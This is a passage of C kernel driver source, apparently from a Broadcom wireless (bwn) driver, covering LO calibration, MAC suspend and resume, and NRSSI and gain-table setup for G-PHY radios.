sizeof(struct bwn_loctl)); i = begin; d->curstate = i; while (1) { KASSERT(i >= 1 && i <= 8, ("%s:%d: fail", __func__, __LINE__)); memcpy(&test, &orig, sizeof(struct bwn_loctl)); test.i += modifiers[i - 1].i * d->multipler; test.q += modifiers[i - 1].q * d->multipler; if ((test.i != prev.i || test.q != prev.q) && (abs(test.i) <= 16 && abs(test.q) <= 16)) { bwn_lo_write(mac, &test); feedth = bwn_lo_calcfeed(mac, pg->pg_lna_gain, pg->pg_pga_gain, pg->pg_trsw_rx_gain); if (feedth < d->feedth) { memcpy(probe, &test, sizeof(struct bwn_loctl)); lower = 1; d->feedth = feedth; if (d->nmeasure < 2 && !BWN_HAS_LOOPBACK(phy)) break; } } memcpy(&prev, &test, sizeof(prev)); if (i == end) break; if (i == 8) i = 1; else i++; d->curstate = i; } return (lower); } static void bwn_lo_probe_sm(struct bwn_mac *mac, struct bwn_loctl *loctl, int *rxgain) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_lo_g_sm d; struct bwn_loctl probe; int lower, repeat, cnt = 0; uint16_t feedth; d.nmeasure = 0; d.multipler = 1; if (BWN_HAS_LOOPBACK(phy)) d.multipler = 3; memcpy(&d.loctl, loctl, sizeof(struct bwn_loctl)); repeat = (BWN_HAS_LOOPBACK(phy)) ? 4 : 1; do { bwn_lo_write(mac, &d.loctl); feedth = bwn_lo_calcfeed(mac, pg->pg_lna_gain, pg->pg_pga_gain, pg->pg_trsw_rx_gain); if (feedth < 0x258) { if (feedth >= 0x12c) *rxgain += 6; else *rxgain += 3; feedth = bwn_lo_calcfeed(mac, pg->pg_lna_gain, pg->pg_pga_gain, pg->pg_trsw_rx_gain); } d.feedth = feedth; d.curstate = 0; do { KASSERT(d.curstate >= 0 && d.curstate <= 8, ("%s:%d: fail", __func__, __LINE__)); memcpy(&probe, &d.loctl, sizeof(struct bwn_loctl)); lower = bwn_lo_probe_loctl(mac, &probe, &d); if (!lower) break; if ((probe.i == d.loctl.i) && (probe.q == d.loctl.q)) break; memcpy(&d.loctl, &probe, sizeof(struct bwn_loctl)); d.nmeasure++; } while (d.nmeasure < 24); memcpy(loctl, &d.loctl, sizeof(struct bwn_loctl)); if (BWN_HAS_LOOPBACK(phy)) { if (d.feedth > 0x1194) *rxgain -= 6; else if (d.feedth < 0x5dc) *rxgain += 3; if (cnt == 0) { if (d.feedth <= 0x5dc) { d.multipler = 1; cnt++; } else d.multipler = 2; } else if (cnt == 2) d.multipler = 1; } bwn_lo_measure_gain_values(mac, *rxgain, BWN_HAS_LOOPBACK(phy)); } while (++cnt < repeat); } static struct bwn_lo_calib * bwn_lo_calibset(struct bwn_mac *mac, const struct bwn_bbatt *bbatt, const struct bwn_rfatt *rfatt) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_loctl loctl = { 0, 0 }; struct bwn_lo_calib *cal; struct bwn_lo_g_value sval = { 0 }; int rxgain; uint16_t pad, reg, value; sval.old_channel = phy->chan; bwn_mac_suspend(mac); bwn_lo_save(mac, &sval); reg = bwn_lo_txctl_regtable(mac, &value, &pad); BWN_RF_SETMASK(mac, 0x43, 0xfff0, rfatt->att); BWN_RF_SETMASK(mac, reg, ~value, (rfatt->padmix ? value :0)); rxgain = (rfatt->att * 2) + (bbatt->att / 2); if (rfatt->padmix) rxgain -= pad; if (BWN_HAS_LOOPBACK(phy)) rxgain += pg->pg_max_lb_gain; bwn_lo_measure_gain_values(mac, rxgain, BWN_HAS_LOOPBACK(phy)); bwn_phy_g_set_bbatt(mac, bbatt->att); bwn_lo_probe_sm(mac, &loctl, &rxgain); bwn_lo_restore(mac, &sval); bwn_mac_enable(mac); cal = malloc(sizeof(*cal), M_DEVBUF, M_NOWAIT | M_ZERO); if (!cal) { device_printf(mac->mac_sc->sc_dev, "out of memory\n"); return (NULL); } memcpy(&cal->bbatt, bbatt, sizeof(*bbatt)); memcpy(&cal->rfatt, rfatt, sizeof(*rfatt)); memcpy(&cal->ctl, &loctl, sizeof(loctl)); BWN_GETTIME(cal->calib_time); return (cal); } static struct bwn_lo_calib * bwn_lo_get_calib(struct bwn_mac *mac, const struct bwn_bbatt *bbatt, const struct bwn_rfatt *rfatt) { struct bwn_txpwr_loctl *lo = &mac->mac_phy.phy_g.pg_loctl; struct bwn_lo_calib *c; TAILQ_FOREACH(c, &lo->calib_list, list) { if (!BWN_BBATTCMP(&c->bbatt, bbatt)) continue; if (!BWN_RFATTCMP(&c->rfatt, rfatt)) continue; return (c); } c = bwn_lo_calibset(mac, bbatt, rfatt); if (!c) return (NULL); TAILQ_INSERT_TAIL(&lo->calib_list, c, list); return (c); } static void bwn_phy_g_dc_lookup_init(struct bwn_mac *mac, uint8_t update) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_softc *sc = mac->mac_sc; struct bwn_txpwr_loctl *lo = &pg->pg_loctl; const struct bwn_rfatt *rfatt; const struct bwn_bbatt *bbatt; uint64_t pvector; int i; int rf_offset, bb_offset; uint8_t changed = 0; KASSERT(BWN_DC_LT_SIZE == 32, ("%s:%d: fail", __func__, __LINE__)); KASSERT(lo->rfatt.len * lo->bbatt.len <= 64, ("%s:%d: fail", __func__, __LINE__)); pvector = lo->power_vector; if (!update && !pvector) return; bwn_mac_suspend(mac); for (i = 0; i < BWN_DC_LT_SIZE * 2; i++) { struct bwn_lo_calib *cal; int idx; uint16_t val; if (!update && !(pvector & (((uint64_t)1ULL) << i))) continue; bb_offset = i / lo->rfatt.len; rf_offset = i % lo->rfatt.len; bbatt = &(lo->bbatt.array[bb_offset]); rfatt = &(lo->rfatt.array[rf_offset]); cal = bwn_lo_calibset(mac, bbatt, rfatt); if (!cal) { device_printf(sc->sc_dev, "LO: Could not " "calibrate DC table entry\n"); continue; } val = (uint8_t)(cal->ctl.q); val |= ((uint8_t)(cal->ctl.i)) << 4; free(cal, M_DEVBUF); idx = i / 2; if (i % 2) lo->dc_lt[idx] = (lo->dc_lt[idx] & 0x00ff) | ((val & 0x00ff) << 8); else lo->dc_lt[idx] = (lo->dc_lt[idx] & 0xff00) | (val & 0x00ff); changed = 1; } if (changed) { for (i = 0; i < BWN_DC_LT_SIZE; i++) BWN_PHY_WRITE(mac, 0x3a0 + i, lo->dc_lt[i]); } bwn_mac_enable(mac); } static void bwn_lo_fixup_rfatt(struct bwn_rfatt *rf) { if (!rf->padmix) return; if ((rf->att != 1) && (rf->att != 2) && (rf->att != 3)) rf->att = 4; } static void bwn_lo_g_adjust(struct bwn_mac *mac) { struct bwn_phy_g *pg = &mac->mac_phy.phy_g; struct bwn_lo_calib *cal; struct bwn_rfatt rf; memcpy(&rf, &pg->pg_rfatt, sizeof(rf)); bwn_lo_fixup_rfatt(&rf); cal = bwn_lo_get_calib(mac, &pg->pg_bbatt, &rf); if (!cal) return; bwn_lo_write(mac, &cal->ctl); } static void bwn_lo_g_init(struct bwn_mac *mac) { if (!bwn_has_hwpctl(mac)) return; bwn_lo_get_powervector(mac); bwn_phy_g_dc_lookup_init(mac, 1); } static void bwn_mac_suspend(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; int i; uint32_t tmp; KASSERT(mac->mac_suspended >= 0, ("%s:%d: fail", __func__, __LINE__)); if (mac->mac_suspended == 0) { bwn_psctl(mac, BWN_PS_AWAKE); BWN_WRITE_4(mac, BWN_MACCTL, BWN_READ_4(mac, BWN_MACCTL) & ~BWN_MACCTL_ON); BWN_READ_4(mac, BWN_MACCTL); for (i = 35; i; i--) { tmp = BWN_READ_4(mac, BWN_INTR_REASON); if (tmp & BWN_INTR_MAC_SUSPENDED) goto out; DELAY(10); } for (i = 40; i; i--) { tmp = BWN_READ_4(mac, BWN_INTR_REASON); if (tmp & BWN_INTR_MAC_SUSPENDED) goto out; DELAY(1000); } device_printf(sc->sc_dev, "MAC suspend failed\n"); } out: mac->mac_suspended++; } static void bwn_mac_enable(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; uint16_t state; state = bwn_shm_read_2(mac, BWN_SHARED, BWN_SHARED_UCODESTAT); if (state != BWN_SHARED_UCODESTAT_SUSPEND && state != BWN_SHARED_UCODESTAT_SLEEP) device_printf(sc->sc_dev, "warn: firmware state (%d)\n", state); mac->mac_suspended--; KASSERT(mac->mac_suspended >= 0, ("%s:%d: fail", __func__, __LINE__)); if (mac->mac_suspended == 0) { BWN_WRITE_4(mac, BWN_MACCTL, BWN_READ_4(mac, BWN_MACCTL) | BWN_MACCTL_ON); BWN_WRITE_4(mac, BWN_INTR_REASON, BWN_INTR_MAC_SUSPENDED); BWN_READ_4(mac, BWN_MACCTL); BWN_READ_4(mac, BWN_INTR_REASON); bwn_psctl(mac, 0); } } static void bwn_psctl(struct bwn_mac *mac, uint32_t flags) { struct bwn_softc *sc = mac->mac_sc; int i; uint16_t ucstat; KASSERT(!((flags & BWN_PS_ON) && (flags & BWN_PS_OFF)), ("%s:%d: fail", __func__, __LINE__)); KASSERT(!((flags & BWN_PS_AWAKE) && (flags & BWN_PS_ASLEEP)), ("%s:%d: fail", __func__, __LINE__)); /* XXX forcibly awake and hwps-off */ BWN_WRITE_4(mac, BWN_MACCTL, (BWN_READ_4(mac, BWN_MACCTL) | BWN_MACCTL_AWAKE) & ~BWN_MACCTL_HWPS); BWN_READ_4(mac, BWN_MACCTL); if (siba_get_revid(sc->sc_dev) >= 5) { for (i = 0; i < 100; i++) { ucstat = bwn_shm_read_2(mac, BWN_SHARED, BWN_SHARED_UCODESTAT); if (ucstat != BWN_SHARED_UCODESTAT_SLEEP) break; DELAY(10); } } } static int16_t bwn_nrssi_read(struct bwn_mac *mac, uint16_t offset) { BWN_PHY_WRITE(mac, BWN_PHY_NRSSI_CTRL, offset); return ((int16_t)BWN_PHY_READ(mac, BWN_PHY_NRSSI_DATA)); } static void bwn_nrssi_threshold(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_softc *sc = mac->mac_sc; int32_t a, b; int16_t tmp16; uint16_t tmpu16; KASSERT(phy->type == BWN_PHYTYPE_G, ("%s: fail", __func__)); if (phy->gmode && (siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_RSSI)) { if (!pg->pg_aci_wlan_automatic && pg->pg_aci_enable) { a = 0x13; b = 0x12; } else { a = 0xe; b = 0x11; } a = a * (pg->pg_nrssi[1] - pg->pg_nrssi[0]); a += (pg->pg_nrssi[0] << 6); a += (a < 32) ? 31 : 32; a = a >> 6; a = MIN(MAX(a, -31), 31); b = b * (pg->pg_nrssi[1] - pg->pg_nrssi[0]); b += (pg->pg_nrssi[0] << 6); if (b < 32) b += 31; else b += 32; b = b >> 6; b = MIN(MAX(b, -31), 31); tmpu16 = BWN_PHY_READ(mac, 0x048a) & 0xf000; tmpu16 |= ((uint32_t)b & 0x0000003f); tmpu16 |= (((uint32_t)a & 0x0000003f) << 6); BWN_PHY_WRITE(mac, 0x048a, tmpu16); return; } tmp16 = bwn_nrssi_read(mac, 0x20); if (tmp16 >= 0x20) tmp16 -= 0x40; BWN_PHY_SETMASK(mac, 0x048a, 0xf000, (tmp16 < 3) ? 0x09eb : 0x0aed); } static void bwn_nrssi_slope_11g(struct bwn_mac *mac) { #define SAVE_RF_MAX 3 #define SAVE_PHY_COMM_MAX 4 #define SAVE_PHY3_MAX 8 static const uint16_t save_rf_regs[SAVE_RF_MAX] = { 0x7a, 0x52, 0x43 }; static const uint16_t save_phy_comm_regs[SAVE_PHY_COMM_MAX] = { 0x15, 0x5a, 0x59, 0x58 }; static const uint16_t save_phy3_regs[SAVE_PHY3_MAX] = { 0x002e, 0x002f, 0x080f, BWN_PHY_G_LOCTL, 0x0801, 0x0060, 0x0014, 0x0478 }; struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; int32_t i, tmp32, phy3_idx = 0; uint16_t delta, tmp; uint16_t save_rf[SAVE_RF_MAX]; uint16_t save_phy_comm[SAVE_PHY_COMM_MAX]; uint16_t save_phy3[SAVE_PHY3_MAX]; uint16_t ant_div, phy0, chan_ex; int16_t nrssi0, nrssi1; KASSERT(phy->type == BWN_PHYTYPE_G, ("%s:%d: fail", __func__, __LINE__)); if (phy->rf_rev >= 9) return; if (phy->rf_rev == 8) bwn_nrssi_offset(mac); BWN_PHY_MASK(mac, BWN_PHY_G_CRS, 0x7fff); BWN_PHY_MASK(mac, 0x0802, 0xfffc); /* * Save RF/PHY registers for later restoration */ ant_div = BWN_READ_2(mac, 0x03e2); BWN_WRITE_2(mac, 0x03e2, BWN_READ_2(mac, 0x03e2) | 0x8000); for (i = 0; i < SAVE_RF_MAX; ++i) save_rf[i] = BWN_RF_READ(mac, save_rf_regs[i]); for (i = 0; i < SAVE_PHY_COMM_MAX; ++i) save_phy_comm[i] = BWN_PHY_READ(mac, save_phy_comm_regs[i]); phy0 = BWN_READ_2(mac, BWN_PHY0); chan_ex = BWN_READ_2(mac, BWN_CHANNEL_EXT); if (phy->rev >= 3) { for (i = 0; i < SAVE_PHY3_MAX; ++i) save_phy3[i] = BWN_PHY_READ(mac, save_phy3_regs[i]); BWN_PHY_WRITE(mac, 0x002e, 0); BWN_PHY_WRITE(mac, BWN_PHY_G_LOCTL, 0); switch (phy->rev) { case 4: case 6: case 7: BWN_PHY_SET(mac, 0x0478, 0x0100); BWN_PHY_SET(mac, 0x0801, 0x0040); break; case 3: case 5: BWN_PHY_MASK(mac, 0x0801, 0xffbf); break; } BWN_PHY_SET(mac, 0x0060, 0x0040); BWN_PHY_SET(mac, 0x0014, 0x0200); } /* * Calculate nrssi0 */ BWN_RF_SET(mac, 0x007a, 0x0070); bwn_set_all_gains(mac, 0, 8, 0); BWN_RF_MASK(mac, 0x007a, 0x00f7); if (phy->rev >= 2) { BWN_PHY_SETMASK(mac, 0x0811, 0xffcf, 0x0030); BWN_PHY_SETMASK(mac, 0x0812, 0xffcf, 0x0010); } BWN_RF_SET(mac, 0x007a, 0x0080); DELAY(20); nrssi0 = (int16_t) ((BWN_PHY_READ(mac, 0x047f) >> 8) & 0x003f); if (nrssi0 >= 0x0020) nrssi0 -= 0x0040; /* * Calculate nrssi1 */ BWN_RF_MASK(mac, 0x007a, 0x007f); if (phy->rev >= 2) BWN_PHY_SETMASK(mac, 0x0003, 0xff9f, 0x0040); BWN_WRITE_2(mac, BWN_CHANNEL_EXT, BWN_READ_2(mac, BWN_CHANNEL_EXT) | 0x2000); BWN_RF_SET(mac, 0x007a, 0x000f); BWN_PHY_WRITE(mac, 0x0015, 0xf330); if (phy->rev >= 2) { BWN_PHY_SETMASK(mac, 0x0812, 0xffcf, 0x0020); BWN_PHY_SETMASK(mac, 0x0811, 0xffcf, 0x0020); } bwn_set_all_gains(mac, 3, 0, 1); if (phy->rf_rev == 8) { BWN_RF_WRITE(mac, 0x0043, 0x001f); } else { tmp = BWN_RF_READ(mac, 0x0052) & 0xff0f; BWN_RF_WRITE(mac, 0x0052, tmp | 0x0060); tmp = BWN_RF_READ(mac, 0x0043) & 0xfff0; BWN_RF_WRITE(mac, 0x0043, tmp | 0x0009); } BWN_PHY_WRITE(mac, 0x005a, 0x0480); BWN_PHY_WRITE(mac, 0x0059, 0x0810); BWN_PHY_WRITE(mac, 0x0058, 0x000d); DELAY(20); nrssi1 = (int16_t) ((BWN_PHY_READ(mac, 0x047f) >> 8) & 0x003f); /* * Install calculated narrow RSSI values */ if (nrssi1 >= 0x0020) nrssi1 -= 0x0040; if (nrssi0 == nrssi1) pg->pg_nrssi_slope = 0x00010000; else pg->pg_nrssi_slope = 0x00400000 / (nrssi0 - nrssi1); if (nrssi0 >= -4) { pg->pg_nrssi[0] = nrssi1; pg->pg_nrssi[1] = nrssi0; } /* * Restore saved RF/PHY registers */ if (phy->rev >= 3) { for (phy3_idx = 0; phy3_idx < 4; ++phy3_idx) { BWN_PHY_WRITE(mac, save_phy3_regs[phy3_idx], save_phy3[phy3_idx]); } } if (phy->rev >= 2) { BWN_PHY_MASK(mac, 0x0812, 0xffcf); BWN_PHY_MASK(mac, 0x0811, 0xffcf); } for (i = 0; i < SAVE_RF_MAX; ++i) BWN_RF_WRITE(mac, save_rf_regs[i], save_rf[i]); BWN_WRITE_2(mac, 0x03e2, ant_div); BWN_WRITE_2(mac, 0x03e6, phy0); BWN_WRITE_2(mac, BWN_CHANNEL_EXT, chan_ex); for (i = 0; i < SAVE_PHY_COMM_MAX; ++i) BWN_PHY_WRITE(mac, save_phy_comm_regs[i], save_phy_comm[i]); bwn_spu_workaround(mac, phy->chan); BWN_PHY_SET(mac, 0x0802, (0x0001 | 0x0002)); bwn_set_original_gains(mac); BWN_PHY_SET(mac, BWN_PHY_G_CRS, 0x8000); if (phy->rev >= 3) { for (; phy3_idx < SAVE_PHY3_MAX; ++phy3_idx) { BWN_PHY_WRITE(mac, save_phy3_regs[phy3_idx], save_phy3[phy3_idx]); } } delta = 0x1f - pg->pg_nrssi[0]; for (i = 0; i < 64; i++) { tmp32 = (((i - delta) * pg->pg_nrssi_slope) / 0x10000) + 0x3a; tmp32 = MIN(MAX(tmp32, 0), 0x3f); pg->pg_nrssi_lt[i] = tmp32; } bwn_nrssi_threshold(mac); #undef SAVE_RF_MAX #undef SAVE_PHY_COMM_MAX #undef SAVE_PHY3_MAX } static void bwn_nrssi_offset(struct bwn_mac *mac) { #define SAVE_RF_MAX 2 #define SAVE_PHY_COMM_MAX 10 #define SAVE_PHY6_MAX 8 static const uint16_t save_rf_regs[SAVE_RF_MAX] = { 0x7a, 0x43 }; static const uint16_t save_phy_comm_regs[SAVE_PHY_COMM_MAX] = { 0x0001, 0x0811, 0x0812, 0x0814, 0x0815, 0x005a, 0x0059, 0x0058, 0x000a, 0x0003 }; static const uint16_t save_phy6_regs[SAVE_PHY6_MAX] = { 0x002e, 0x002f, 0x080f, 0x0810, 0x0801, 0x0060, 0x0014, 0x0478 }; struct bwn_phy *phy = &mac->mac_phy; int i, phy6_idx = 0; uint16_t save_rf[SAVE_RF_MAX]; uint16_t save_phy_comm[SAVE_PHY_COMM_MAX]; uint16_t save_phy6[SAVE_PHY6_MAX]; int16_t nrssi; uint16_t saved = 0xffff; for (i = 0; i < SAVE_PHY_COMM_MAX; ++i) save_phy_comm[i] = BWN_PHY_READ(mac, save_phy_comm_regs[i]); for (i = 0; i < SAVE_RF_MAX; ++i) save_rf[i] = BWN_RF_READ(mac, save_rf_regs[i]); BWN_PHY_MASK(mac, 0x0429, 0x7fff); BWN_PHY_SETMASK(mac, 0x0001, 0x3fff, 0x4000); BWN_PHY_SET(mac, 0x0811, 0x000c); BWN_PHY_SETMASK(mac, 0x0812, 0xfff3, 0x0004); BWN_PHY_MASK(mac, 0x0802, ~(0x1 | 0x2)); if (phy->rev >= 6) { for (i = 0; i < SAVE_PHY6_MAX; ++i) save_phy6[i] = BWN_PHY_READ(mac, save_phy6_regs[i]); BWN_PHY_WRITE(mac, 0x002e, 0); BWN_PHY_WRITE(mac, 0x002f, 0); BWN_PHY_WRITE(mac, 0x080f, 0); BWN_PHY_WRITE(mac, 0x0810, 0); BWN_PHY_SET(mac, 0x0478, 0x0100); BWN_PHY_SET(mac, 0x0801, 0x0040); BWN_PHY_SET(mac, 0x0060, 0x0040); BWN_PHY_SET(mac, 0x0014, 0x0200); } BWN_RF_SET(mac, 0x007a, 0x0070); BWN_RF_SET(mac, 0x007a, 0x0080); DELAY(30); nrssi = (int16_t) ((BWN_PHY_READ(mac, 0x047f) >> 8) & 0x003f); if (nrssi >= 0x20) nrssi -= 0x40; if (nrssi == 31) { for (i = 7; i >= 4; i--) { BWN_RF_WRITE(mac, 0x007b, i); DELAY(20); nrssi = (int16_t) ((BWN_PHY_READ(mac, 0x047f) >> 8) & 0x003f); if (nrssi >= 0x20) nrssi -= 0x40; if (nrssi < 31 && saved == 0xffff) saved = i; } if (saved == 0xffff) saved = 4; } else { BWN_RF_MASK(mac, 0x007a, 0x007f); if (phy->rev != 1) { BWN_PHY_SET(mac, 0x0814, 0x0001); BWN_PHY_MASK(mac, 0x0815, 0xfffe); } BWN_PHY_SET(mac, 0x0811, 0x000c); BWN_PHY_SET(mac, 0x0812, 0x000c); BWN_PHY_SET(mac, 0x0811, 0x0030); BWN_PHY_SET(mac, 0x0812, 0x0030); BWN_PHY_WRITE(mac, 0x005a, 0x0480); BWN_PHY_WRITE(mac, 0x0059, 0x0810); BWN_PHY_WRITE(mac, 0x0058, 0x000d); if (phy->rev == 0) BWN_PHY_WRITE(mac, 0x0003, 0x0122); else BWN_PHY_SET(mac, 0x000a, 0x2000); if (phy->rev != 1) { BWN_PHY_SET(mac, 0x0814, 0x0004); BWN_PHY_MASK(mac, 0x0815, 0xfffb); } BWN_PHY_SETMASK(mac, 0x0003, 0xff9f, 0x0040); BWN_RF_SET(mac, 0x007a, 0x000f); bwn_set_all_gains(mac, 3, 0, 1); BWN_RF_SETMASK(mac, 0x0043, 0x00f0, 0x000f); DELAY(30); nrssi = (int16_t) ((BWN_PHY_READ(mac, 0x047f) >> 8) & 0x003f); if (nrssi >= 0x20) nrssi -= 0x40; if (nrssi == -32) { for (i = 0; i < 4; i++) { BWN_RF_WRITE(mac, 0x007b, i); DELAY(20); nrssi = (int16_t)((BWN_PHY_READ(mac, 0x047f) >> 8) & 0x003f); if (nrssi >= 0x20) nrssi -= 0x40; if (nrssi > -31 && saved == 0xffff) saved = i; } if (saved == 0xffff) saved = 3; } else saved = 0; } BWN_RF_WRITE(mac, 0x007b, saved); /* * Restore saved RF/PHY registers */ if (phy->rev >= 6) { for (phy6_idx = 0; phy6_idx < 4; ++phy6_idx) { BWN_PHY_WRITE(mac, save_phy6_regs[phy6_idx], save_phy6[phy6_idx]); } } if (phy->rev != 1) { for (i = 3; i < 5; i++) BWN_PHY_WRITE(mac, save_phy_comm_regs[i], save_phy_comm[i]); } for (i = 5; i < SAVE_PHY_COMM_MAX; i++) BWN_PHY_WRITE(mac, save_phy_comm_regs[i], save_phy_comm[i]); for (i = SAVE_RF_MAX - 1; i >= 0; --i) BWN_RF_WRITE(mac, save_rf_regs[i], save_rf[i]); BWN_PHY_WRITE(mac, 0x0802, BWN_PHY_READ(mac, 0x0802) | 0x1 | 0x2); BWN_PHY_SET(mac, 0x0429, 0x8000); bwn_set_original_gains(mac); if (phy->rev >= 6) { for (; phy6_idx < SAVE_PHY6_MAX; ++phy6_idx) { BWN_PHY_WRITE(mac, save_phy6_regs[phy6_idx], save_phy6[phy6_idx]); } } BWN_PHY_WRITE(mac, save_phy_comm_regs[0], save_phy_comm[0]); BWN_PHY_WRITE(mac, save_phy_comm_regs[2], save_phy_comm[2]); BWN_PHY_WRITE(mac, save_phy_comm_regs[1], save_phy_comm[1]); } static void bwn_set_all_gains(struct bwn_mac *mac, int16_t first, int16_t second, int16_t third) { struct bwn_phy *phy = &mac->mac_phy; uint16_t i; uint16_t start = 0x08, end = 0x18; uint16_t tmp; uint16_t table; if (phy->rev <= 1) { start = 0x10; end = 0x20; } table = BWN_OFDMTAB_GAINX; if (phy->rev <= 1) table = BWN_OFDMTAB_GAINX_R1; for (i = 0; i < 4; i++) bwn_ofdmtab_write_2(mac, table, i, first); for (i = start; i < end; i++) bwn_ofdmtab_write_2(mac, table, i, second); if (third != -1) { tmp = ((uint16_t) third << 14) | ((uint16_t) third << 6); BWN_PHY_SETMASK(mac, 0x04a0, 0xbfbf, tmp); BWN_PHY_SETMASK(mac, 0x04a1, 0xbfbf, tmp); BWN_PHY_SETMASK(mac, 0x04a2, 0xbfbf, tmp); } bwn_dummy_transmission(mac, 0, 1); } static void bwn_set_original_gains(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; uint16_t i, tmp; uint16_t table; uint16_t start = 0x0008, end = 0x0018; if (phy->rev <= 1) { start = 0x0010; end = 0x0020; } table = BWN_OFDMTAB_GAINX; if (phy->rev <= 1) table = BWN_OFDMTAB_GAINX_R1; for (i = 0; i < 4; i++) { tmp = (i & 0xfffc); tmp |= (i & 0x0001) << 1; tmp |= (i & 0x0002) >> 1; bwn_ofdmtab_write_2(mac, table, i, tmp); } for (i = start; i < end; i++) bwn_ofdmtab_write_2(mac, table, i, i - start); BWN_PHY_SETMASK(mac, 0x04a0, 0xbfbf, 0x4040); BWN_PHY_SETMASK(mac, 0x04a1, 0xbfbf, 0x4040); BWN_PHY_SETMASK(mac, 0x04a2, 0xbfbf, 0x4000); bwn_dummy_transmission(mac, 0, 1); } static void bwn_phy_hwpctl_init(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_rfatt old_rfatt, rfatt; struct bwn_bbatt old_bbatt, bbatt; struct bwn_softc *sc = mac->mac_sc; uint8_t old_txctl = 0; KASSERT(phy->type == BWN_PHYTYPE_G, ("%s:%d: fail", __func__, __LINE__)); if ((siba_get_pci_subvendor(sc->sc_dev) == SIBA_BOARDVENDOR_BCM) && (siba_get_pci_subdevice(sc->sc_dev) == SIBA_BOARD_BU4306)) return; BWN_PHY_WRITE(mac, 0x0028, 0x8018); BWN_WRITE_2(mac, BWN_PHY0, BWN_READ_2(mac, BWN_PHY0) & 0xffdf); if (!phy->gmode) return; bwn_hwpctl_early_init(mac); if (pg->pg_curtssi == 0) { if (phy->rf_ver == 0x2050 && phy->analog == 0) { BWN_RF_SETMASK(mac, 0x0076, 0x00f7, 0x0084); } else { memcpy(&old_rfatt, &pg->pg_rfatt, sizeof(old_rfatt)); memcpy(&old_bbatt, &pg->pg_bbatt, sizeof(old_bbatt)); old_txctl = pg->pg_txctl; bbatt.att = 11; if (phy->rf_rev == 8) { rfatt.att = 15; rfatt.padmix = 1; } else { rfatt.att = 9; rfatt.padmix = 0; } bwn_phy_g_set_txpwr_sub(mac, &bbatt, &rfatt, 0); } bwn_dummy_transmission(mac, 0, 1); pg->pg_curtssi = BWN_PHY_READ(mac, BWN_PHY_TSSI); if (phy->rf_ver == 0x2050 && phy->analog == 0) BWN_RF_MASK(mac, 0x0076, 0xff7b); else bwn_phy_g_set_txpwr_sub(mac, &old_bbatt, &old_rfatt, old_txctl); } bwn_hwpctl_init_gphy(mac); /* clear TSSI */ bwn_shm_write_2(mac, BWN_SHARED, 0x0058, 0x7f7f); bwn_shm_write_2(mac, BWN_SHARED, 0x005a, 0x7f7f); bwn_shm_write_2(mac, BWN_SHARED, 0x0070, 0x7f7f); bwn_shm_write_2(mac, BWN_SHARED, 0x0072, 0x7f7f); } static void bwn_hwpctl_early_init(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; if (!bwn_has_hwpctl(mac)) { BWN_PHY_WRITE(mac, 0x047a, 0xc111); return; } BWN_PHY_MASK(mac, 0x0036, 0xfeff); BWN_PHY_WRITE(mac, 0x002f, 0x0202); BWN_PHY_SET(mac, 0x047c, 0x0002); BWN_PHY_SET(mac, 0x047a, 0xf000); if (phy->rf_ver == 0x2050 && phy->rf_rev == 8) { BWN_PHY_SETMASK(mac, 0x047a, 0xff0f, 0x0010); BWN_PHY_SET(mac, 0x005d, 0x8000); BWN_PHY_SETMASK(mac, 0x004e, 0xffc0, 0x0010); BWN_PHY_WRITE(mac, 0x002e, 0xc07f); BWN_PHY_SET(mac, 0x0036, 0x0400); } else { BWN_PHY_SET(mac, 0x0036, 0x0200); BWN_PHY_SET(mac, 0x0036, 0x0400); BWN_PHY_MASK(mac, 0x005d, 0x7fff); BWN_PHY_MASK(mac, 0x004f, 0xfffe); BWN_PHY_SETMASK(mac, 0x004e, 0xffc0, 0x0010); BWN_PHY_WRITE(mac, 0x002e, 0xc07f); BWN_PHY_SETMASK(mac, 0x047a, 0xff0f, 0x0010); } } static void bwn_hwpctl_init_gphy(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_txpwr_loctl *lo = &pg->pg_loctl; int i; uint16_t nr_written = 0, tmp, value; uint8_t rf, bb; if (!bwn_has_hwpctl(mac)) { bwn_hf_write(mac, bwn_hf_read(mac) & ~BWN_HF_HW_POWERCTL); return; } BWN_PHY_SETMASK(mac, 0x0036, 0xffc0, (pg->pg_idletssi - pg->pg_curtssi)); BWN_PHY_SETMASK(mac, 0x0478, 0xff00, (pg->pg_idletssi - pg->pg_curtssi)); for (i = 0; i < 32; i++) bwn_ofdmtab_write_2(mac, 0x3c20, i, pg->pg_tssi2dbm[i]); for (i = 32; i < 64; i++) bwn_ofdmtab_write_2(mac, 0x3c00, i - 32, pg->pg_tssi2dbm[i]); for (i = 0; i < 64; i += 2) { value = (uint16_t) pg->pg_tssi2dbm[i]; value |= ((uint16_t) pg->pg_tssi2dbm[i + 1]) << 8; BWN_PHY_WRITE(mac, 0x380 + (i / 2), value); } for (rf = 0; rf < lo->rfatt.len; rf++) { for (bb = 0; bb < lo->bbatt.len; bb++) { if (nr_written >= 0x40) return; tmp = lo->bbatt.array[bb].att; tmp <<= 8; if (phy->rf_rev == 8) tmp |= 0x50; else tmp |= 0x40; tmp |= lo->rfatt.array[rf].att; BWN_PHY_WRITE(mac, 0x3c0 + nr_written, tmp); nr_written++; } } BWN_PHY_MASK(mac, 0x0060, 0xffbf); BWN_PHY_WRITE(mac, 0x0014, 0x0000); KASSERT(phy->rev >= 6, ("%s:%d: fail", __func__, __LINE__)); BWN_PHY_SET(mac, 0x0478, 0x0800); BWN_PHY_MASK(mac, 0x0478, 0xfeff); BWN_PHY_MASK(mac, 0x0801, 0xffbf); bwn_phy_g_dc_lookup_init(mac, 1); bwn_hf_write(mac, bwn_hf_read(mac) | 